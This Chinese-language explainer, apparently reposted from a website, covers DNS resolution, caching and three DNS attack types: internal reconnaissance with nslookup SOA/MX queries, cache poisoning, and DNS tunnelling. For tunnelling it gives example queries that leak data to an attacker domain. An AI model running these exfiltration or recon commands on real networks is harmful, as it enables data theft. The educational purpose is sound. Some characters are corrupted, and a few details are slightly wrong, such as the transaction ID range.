基于IP協(xié)議，兩臺(tái)計(jì)算機(jī)之間要實(shí)現(xiàn)通信有一個(gè)前提，就是它們分別有一個(gè)IP地址。由于我們大多數(shù)人都善于記住www.taobao.com之類的字串，而非一串如104.196.44.101一般毫無(wú)規(guī)律的IP地址數(shù)字組合，因此，需要一個(gè)程序?qū)⒚�稱字串翻譯成IP地址。

在互聯(lián)網(wǎng)上儲(chǔ)存域名與IP地址間映射關(guān)系的一個(gè)分布式數(shù)據(jù)庫(kù)，能夠?qū)⒚�稱轉(zhuǎn)換為數(shù)字、數(shù)字轉(zhuǎn)換為名稱的程序就被稱為DNS(Domain Name System，域名系統(tǒng))，運(yùn)行DNS系統(tǒng)的主機(jī)就是“DNS服務(wù)器”。如果沒有DNS，任何互聯(lián)網(wǎng)訪問(wèn)就都需要我們記住12個(gè)數(shù)字——服務(wù)器的IP地址。

一、DNS工作原理

作為互聯(lián)網(wǎng)訪問(wèn)中不可或缺的一項(xiàng)技術(shù)，了解DNS的運(yùn)作機(jī)理非常重要。

DNS中的域名-IP映射條目被稱為“DNS記錄”�；ヂ�(lián)網(wǎng)上需要實(shí)現(xiàn)通信的計(jì)算機(jī)數(shù)量過(guò)于龐大，將所有DNS記錄都記錄在一個(gè)記錄集里，由單臺(tái)DNS服務(wù)器進(jìn)行存儲(chǔ)處理是不切實(shí)際的。因此，在DNS體系的設(shè)計(jì)中，全球的DNS被分成了多個(gè)小記錄集，這些記錄集被稱為“域”(Domain)。一個(gè)域包含的記錄數(shù)量仍有可能非常大，因此，域還可以被劃分為更小的子集——“區(qū)”(Zone)。

因此，互聯(lián)網(wǎng)上所有的域名-IP映射條目是由許多DNS服務(wù)器共同存儲(chǔ)的。任何要根據(jù)域名查詢IP或根據(jù)IP查詢域名的計(jì)算機(jī)，都可以向其DNS服務(wù)器發(fā)起查詢，并且DNS服務(wù)器還知道如何在多臺(tái)DNS服務(wù)器之間發(fā)起查詢。當(dāng)DNS服務(wù)器查詢其他DNS服務(wù)器時(shí)，我們稱之為“上游”查詢。域查詢可以不停的向上執(zhí)行，直至權(quán)限域名服務(wù)器。

權(quán)限域名服務(wù)器是管理員對(duì)其所管轄域的服務(wù)器名和IP地址進(jìn)行管理的地方。當(dāng)DNS管理員想要對(duì)服務(wù)器名或IP地址實(shí)施增刪改查時(shí)，就會(huì)在權(quán)限域名服務(wù)器(也稱“主DNS服務(wù)器”)上進(jìn)行操作。另外，還有“從DNS服務(wù)器”，用于保存區(qū)或域的DNS記錄副本。

1. 加載頁(yè)面用到的四個(gè)DNS服務(wù)器

• 域名解析服務(wù)器(Resolving name server)：自身存有被查詢的IP-域名條目或向另一個(gè)DNS服務(wù)器請(qǐng)求該IP-域名條目，并響應(yīng)此次查詢的服務(wù)器。
• 根域名服務(wù)器(Root name server)：根區(qū)的域名服務(wù)器。它直接響應(yīng)查詢請(qǐng)求，并返回相應(yīng)的頂級(jí)域權(quán)限域名服務(wù)器列表。
• 頂級(jí)域名服務(wù)器(TLD name Server)：頂級(jí)域名服務(wù)器(TLD)是Internet上的高級(jí)DNS服務(wù)器之一。當(dāng)搜索www.qq.com時(shí)，“.com”TLD服務(wù)器將首先響應(yīng)，在其條目中搜索“qq”字串。
• 權(quán)限域名服務(wù)器(Authoritative name server)：權(quán)限域名服務(wù)器是DNS查詢流程中的最后一站，其存儲(chǔ)有某個(gè)區(qū)的域名條目記錄。

2. DNS服務(wù)的類型

根據(jù)其處理DNS查詢的技術(shù)機(jī)理不同，DNS服務(wù)被分為兩種類型：

• 遞歸DNS服務(wù)：遞歸DNS服務(wù)響應(yīng)DNS查詢并向權(quán)限域名服務(wù)發(fā)起域名條目查詢，或在其緩存的DNS條目中實(shí)施查詢。
• 權(quán)限D(zhuǎn)NS服務(wù)：權(quán)限D(zhuǎn)NS服務(wù)自身存儲(chǔ)DNS條目。因此，如果向權(quán)限D(zhuǎn)NS服務(wù)查詢其存儲(chǔ)的某個(gè)IP-域名條目，則無(wú)需再向其他服務(wù)器發(fā)起查詢。

3. 公共DNS & 私有DNS

對(duì)于需要被公眾在互聯(lián)網(wǎng)上訪問(wèn)的服務(wù)器，它需要具有公共DNS記錄，并且其IP地址在互聯(lián)網(wǎng)上可訪問(wèn)，即不會(huì)被防火墻等訪問(wèn)控制技術(shù)所阻止。任何能夠連接到公共DNS服務(wù)器的人都可以在且無(wú)需身份驗(yàn)證的情況下訪問(wèn)公共DNS服務(wù)器。

但是，并非所有的DNS記錄都是公開的，為了使員工能夠方便地訪問(wèn)企業(yè)內(nèi)網(wǎng)的服務(wù)器，不少企業(yè)都有自身的私有DNS。私有DNS被用于存放不希望公開到互聯(lián)網(wǎng)上的企業(yè)內(nèi)部文件服務(wù)器、郵件服務(wù)器、域控制器、數(shù)據(jù)庫(kù)服務(wù)器、應(yīng)用程序服務(wù)器等的域名和IP。

有一點(diǎn)需要注意的是，私有DNS服務(wù)器和公共DNS服務(wù)器一樣，對(duì)其的訪問(wèn)無(wú)需進(jìn)行身份驗(yàn)證。這主要是因?yàn)樵贒NS技術(shù)創(chuàng)建之初，安全性還不是一個(gè)需要考慮的技術(shù)問(wèn)題。因此，大多數(shù)情況下，企業(yè)內(nèi)部網(wǎng)絡(luò)中的任何用戶都可以在未做身份認(rèn)證的情況下查詢內(nèi)部DNS服務(wù)器存儲(chǔ)的信息。

二、查詢DNS的七個(gè)步驟

(1)當(dāng)用戶試圖訪問(wèn)Internet上的計(jì)算機(jī)，例如，在瀏覽器地址欄中輸入m.51huadong.com時(shí)，就將啟動(dòng)一次DNS查詢。

(2)DNS查詢的第一站是本地DNS緩存。在用戶訪問(wèn)網(wǎng)絡(luò)上不同的域名時(shí)，這些域名對(duì)應(yīng)的IP地址就將存儲(chǔ)在本地緩存中，如果用戶之前訪問(wèn)過(guò)m.51huadong.com，則緩存中就會(huì)存有該網(wǎng)站的IP地址。

(3)如果本地DNS緩存中沒有該域名的IP，DNS就會(huì)用遞歸DNS服務(wù)器進(jìn)行檢查。在互聯(lián)網(wǎng)上，ISP服務(wù)商通常會(huì)建設(shè)和運(yùn)維遞歸DNS服務(wù)器。

(4)遞歸DNS服務(wù)器自身具備緩存，如果在其緩存中存有用戶查詢的IP地址，則會(huì)將其直接返回給用戶。如果沒有，將向其它DNS服務(wù)器發(fā)起查詢。

(5)下一站是TLD域名服務(wù)器，當(dāng)用戶查詢域名 m.51huadong.com時(shí)，存儲(chǔ).cn地址的TLD域名服務(wù)器會(huì)響應(yīng)查詢請(qǐng)求。該服務(wù)器并不存儲(chǔ)我們需要的IP地址，但它能夠向正確的權(quán)限域名服務(wù)器轉(zhuǎn)發(fā)查詢請(qǐng)求。

(6)權(quán)限域名服務(wù)器用 m.51huadong.com的IP地址響應(yīng)此次查詢，遞歸DNS服務(wù)器將其存儲(chǔ)在本地DNS緩存中，并將地址返回給用戶的計(jì)算機(jī)。

(7)用戶計(jì)算機(jī)的本地DNS服務(wù)獲取m.51huadong.com的IP地址并實(shí)施訪問(wèn)。然后，在本地緩存中記錄該域名的IP地址，同時(shí)記錄其生存時(shí)間(TTL)，即本地DNS記錄的有效時(shí)間，若用戶下次訪問(wèn)該域名的時(shí)間超過(guò)TTL時(shí)間，則下次訪問(wèn)m.51huadong.com時(shí)，DNS將再次執(zhí)行上述過(guò)程。

三、DNS查詢的分類

DNS查詢需要給DNS服務(wù)器傳遞的信息包括：

• 當(dāng)前查詢是什么類型;
• 要返回什么信息。

標(biāo)準(zhǔn)的DNS查詢有以下三種類型：

• 遞歸查詢：在遞歸查詢中，計(jì)算機(jī)請(qǐng)求DNS服務(wù)器返回一個(gè)IP地址，或確認(rèn)該DNS服務(wù)器不知道該IP。
• 迭代查詢：在迭代查詢中，查詢者向DNS服務(wù)器請(qǐng)求返回一個(gè)最佳答案。如果DNS服務(wù)器中查不到被查詢IP，它將返回權(quán)限域名服務(wù)器或TLD域名服務(wù)器。查詢者將繼續(xù)此迭代過(guò)程，直到找到被查詢IP或超時(shí)。
• 非遞歸查詢：DNS解析服務(wù)器使用此類查詢來(lái)查找自身緩存中沒有存儲(chǔ)的IP。

四、DNS緩存

如果每次有任何用戶試圖訪問(wèn)m.51huadong.com，都必須向權(quán)限域名服務(wù)器發(fā)起對(duì)該域名的查詢請(qǐng)求，將會(huì)產(chǎn)生大量的網(wǎng)絡(luò)流量!因此，為了使計(jì)算機(jī)不用在每一次訪問(wèn)某個(gè)域名時(shí)都向DNS服務(wù)器發(fā)起IP查詢請(qǐng)求，計(jì)算機(jī)上通常會(huì)存儲(chǔ)一個(gè)自身的域名-IP映射庫(kù)，這個(gè)映射庫(kù)被稱為“DNS緩存”。

• 加快DNS請(qǐng)求響應(yīng)速度
• 減少DNS請(qǐng)求在互聯(lián)網(wǎng)上占用的帶寬

但是，DNS緩存方法也存在一些問(wèn)題，包括：

• DNS信息的變化需要一定的時(shí)間才能傳播開——這意味著，所有DNS服務(wù)器都將其緩存更新為最新的IP數(shù)據(jù)之前，往往需要一段時(shí)間
• 攻擊者可能利用DNS緩存發(fā)起攻擊

DNS緩存有以下幾種不同的類型：

• 瀏覽器DNS緩存：目前大多數(shù)瀏覽器均內(nèi)置了DNS緩存功能，使用本地緩存方式實(shí)現(xiàn)DNS解析通�？焖偾腋咝�。
• 操作系統(tǒng)(OS)DNS緩存：目前，大多數(shù)用戶計(jì)算機(jī)操作系統(tǒng)均具備DNS客戶端，可用于管理DNS解析和請(qǐng)求。此類DNS緩存也是本地化的，因此速度快且無(wú)需占用帶寬。
• 遞歸解析DNS緩存：每個(gè)DNS遞歸服務(wù)器中都有DNS緩存，用于存儲(chǔ)可向其發(fā)起下一步請(qǐng)求的IP。

五、DNS常見漏洞

• 用戶內(nèi)部DNS服務(wù)器會(huì)存儲(chǔ)用戶網(wǎng)絡(luò)域中所有服務(wù)器的內(nèi)部域名與IP，并能夠在無(wú)需身份認(rèn)證的情況下實(shí)施訪問(wèn)。這使得DNS成為攻擊者在內(nèi)網(wǎng)探測(cè)階段的重要信息來(lái)源。
• DNS緩存信息并非一定與權(quán)限域名服務(wù)器一致，攻擊者有可能篡改DNS緩存，如果用戶內(nèi)網(wǎng)的DNS服務(wù)器被攻擊篡改，則使用該DNS服務(wù)器發(fā)起域名訪問(wèn)的計(jì)算機(jī)就會(huì)被誘騙到錯(cuò)誤的服務(wù)器。
• DNS服務(wù)器可能將內(nèi)網(wǎng)的域名查詢從內(nèi)網(wǎng)工作站遞歸轉(zhuǎn)發(fā)至外網(wǎng)服務(wù)器，攻擊者可能利用此行為創(chuàng)建內(nèi)外網(wǎng)之間的“隱通道”來(lái)泄露內(nèi)網(wǎng)數(shù)據(jù)。

1. 利用DNS實(shí)施探測(cè)

一旦攻擊者穿透防火墻進(jìn)入用戶內(nèi)網(wǎng)并控制某臺(tái)計(jì)算機(jī)，就可以利用內(nèi)網(wǎng)的DNS服務(wù)查找重要的服務(wù)器信息，如郵件服務(wù)器、域名服務(wù)器等各類有價(jià)值的信息。如果攻擊者具備足夠的技術(shù)能力，甚至可能利用內(nèi)部DNS服務(wù)器批量發(fā)送用戶網(wǎng)絡(luò)中區(qū)的信息，此類攻擊被稱為“DNS區(qū)傳輸攻擊”。

以下給出了在Windows操作系統(tǒng)環(huán)境中實(shí)現(xiàn)該攻擊的流程：

• 打開命令提示符(ctrl+ esc ➡️輸入字母“cmd” ➡️回車)
• 輸入“ipconfig”，將看到當(dāng)前計(jì)算機(jī)所在的域名、IP地址以及許多其他信息(后續(xù)命令中將會(huì)使用)
• 鍵入“nslookup[IP]”，將看到正在響應(yīng)請(qǐng)求的DNS服務(wù)器名稱，如果名稱已知，則會(huì)顯示列出名稱和IP地址的DNS記錄
• 鍵入“nslookup-type=soa [當(dāng)前計(jì)算機(jī)所在域名]”， 執(zhí)行此命令將返回當(dāng)前計(jì)算機(jī)的權(quán)限D(zhuǎn)NS服務(wù)器，如果您嘗試滲透網(wǎng)絡(luò)，則不會(huì)很方便。
• 鍵入“nslookup-type=MX [當(dāng)前計(jì)算機(jī)所在域名]”，通過(guò)執(zhí)行該命令，攻擊者可以準(zhǔn)確獲知網(wǎng)內(nèi)郵件服務(wù)器的IP信息。

2. 利用DNS實(shí)施流量重定向

當(dāng)用戶嘗試瀏覽到某個(gè)網(wǎng)站時(shí)，他們的計(jì)算機(jī)會(huì)在DNS服務(wù)器中查詢?cè)摼W(wǎng)站的IP。如果DNS服務(wù)器中存有該記錄的緩存，則將直接返回該IP。如果沒有，它會(huì)查詢“上游”DNS服務(wù)器，并將結(jié)果中繼給最終用戶，同時(shí)緩存該信息以供下次使用。

在目前已知的攻擊中，攻擊者已經(jīng)能夠偽造DNS響應(yīng)信息，使其看起來(lái)像是來(lái)自合法的DNS服務(wù)器。要達(dá)到這一目標(biāo)，攻擊者可以利用DNS的三個(gè)弱點(diǎn)：

• DNS對(duì)來(lái)自上游服務(wù)器的響應(yīng)僅執(zhí)行非常弱的認(rèn)證。響應(yīng)信息只需包含正確的事務(wù)ID(一個(gè)16位二進(jìn)制數(shù)字(0-65536))。事實(shí)證明，要猜出正確的事務(wù)ID，技術(shù)難度并不大。
• DNS服務(wù)器接受同時(shí)響應(yīng)多個(gè)查詢請(qǐng)求，因此攻擊者能夠同時(shí)對(duì)事務(wù)ID實(shí)施多次猜測(cè)(與暴力破解密碼思路類似)。
• DNS使用的IP連接很容易被偽造。這意味著攻擊者可以從一臺(tái)計(jì)算機(jī)向DNS服務(wù)器發(fā)送流量，使其看起來(lái)像來(lái)自另一臺(tái)計(jì)算機(jī)，例如另一臺(tái)真實(shí)有效的DNS服務(wù)器。容易被偽造的IP連接類型并不多，不幸的是，DNS恰好是其中之一。

一旦攻擊者成功偽造了DNS響應(yīng)消息，則其可以實(shí)現(xiàn)篡改接收端DNS服務(wù)器的緩存。以下就以一個(gè)典型的場(chǎng)景說(shuō)明這一攻擊行為可能造成的嚴(yán)重后果：

假設(shè)攻擊者了解到用戶單位使用外部應(yīng)用程序來(lái)處理經(jīng)費(fèi)等重要事務(wù)。如果攻擊者篡改了用戶單位DNS服務(wù)器的相關(guān)記錄，則能夠?qū)⒂脩粽T騙至攻擊者偽造的服務(wù)器，誘騙用戶在攻擊者偽造的登陸頁(yè)面上錄入其賬號(hào)及口令信息。

更有耐心的攻擊者還可能將真實(shí)流量轉(zhuǎn)發(fā)給真實(shí)的服務(wù)器(充當(dāng)“中間人”)，因此用戶就不會(huì)發(fā)現(xiàn)攻擊正在發(fā)生。獲取用戶的身份信息后，攻擊者可以在其他相關(guān)系統(tǒng)上嘗試使用這些身份信息，或者直接出售這些信息。

3. 利用DNS構(gòu)建隱通道

假設(shè)攻擊者已經(jīng)設(shè)法進(jìn)入了用戶單位網(wǎng)絡(luò)，控制了一臺(tái)內(nèi)網(wǎng)計(jì)算機(jī)，并且已經(jīng)找到了其想要竊取的關(guān)鍵數(shù)據(jù)。如何在不留任何痕跡的情況下將數(shù)據(jù)傳輸?shù)骄W(wǎng)外?攻擊者可能使用一種被稱為“DNS隧道”的技術(shù)來(lái)實(shí)現(xiàn)。通常的做法如下：

(1)攻擊者在互聯(lián)網(wǎng)上設(shè)置一個(gè)DNS域(如idcbest.com)，并創(chuàng)建一個(gè)權(quán)限域名服務(wù)器

(2)在被攻擊者控制的主機(jī)上，攻擊者可以將數(shù)據(jù)分解為小段并將其插入到一系列DNS查詢中，如下所示：

• nslookup My1secret1.idcbest.com
• nslookup is1that1I1know.idcbest.com
• nsllookup your1data.idcbest.com

(3)用戶單位的DNS服務(wù)器將接收這些請(qǐng)求，并將這些請(qǐng)求轉(zhuǎn)發(fā)回idcbest.com的權(quán)限域名服務(wù)器。攻擊者在其權(quán)限域名服務(wù)器接收到上述流量后，則可以運(yùn)行程序以提取查詢信息的第一部分(.idcbest.com前的內(nèi)容)并將其重新組合，從而將用戶網(wǎng)內(nèi)的數(shù)據(jù)不留痕跡地傳輸?shù)骄W(wǎng)外(此例中傳輸?shù)臄?shù)據(jù)是“My secret is that I know your data.”)。而用戶單位可能永遠(yuǎn)不會(huì)意識(shí)到他們的DNS服務(wù)器被用于泄露自身的數(shù)據(jù)。

六、小結(jié)

DNS技術(shù)已存在了很長(zhǎng)時(shí)間，互聯(lián)網(wǎng)上的每臺(tái)計(jì)算機(jī)都依賴它。然而，利用DNS進(jìn)行內(nèi)網(wǎng)探測(cè)、劫持流量并創(chuàng)建隱蔽信道竊取數(shù)據(jù)，都是DNS服務(wù)可能造成的安全問(wèn)題。幸運(yùn)的是，通過(guò)監(jiān)控DNS服務(wù)器并應(yīng)用安全數(shù)據(jù)分析，目前已有大量技術(shù)可以檢測(cè)并阻止這些攻擊。

本文鏈接：http://m.51huadong.com/cloundnews/11003174.html